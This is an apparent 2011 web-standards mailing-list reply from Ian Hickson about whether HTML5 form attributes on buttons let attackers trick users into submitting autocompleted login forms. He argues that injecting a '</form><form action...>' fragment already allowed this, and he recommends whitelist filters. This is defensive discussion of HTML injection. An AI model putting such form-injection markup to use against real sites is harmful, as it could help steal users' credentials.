On Tue, 2 Aug 2011, Philippe De Ryck wrote: > > The new form attributes, which can be used with submit buttons, can make > it difficult for a user to distinguish the form that is being submitted. > This can be used by an adversary to trick the user into submitting a > form, such as an autocompleted login form. Even though this attack was > already possible with JavaScript enabled, this new vector does not > depend on scripts. Additionally, it is possible that current content > validation filters do not yet prevent against button injection.
Surely this was already possible by just injecting </form><form action...> in the same place as the button would be inserted today? > Alternatively, if changing the specification is not possible, developers > should be warned about this attack vector, so they can update their > content filters. Filters must be written using whitelists. A filter written using a blacklist is essentially worthless. A whitelist filter would not be affected by this or many other additions to HTML. -- Ian Hickson U+1047E )\._.,--....,'``. fL http://ln.hixie.ch/ U+263A /, _.. \ _\ ;`._ ,. Things that are impossible just take longer. `._.-(,_..'--(,_..'`-.;.'
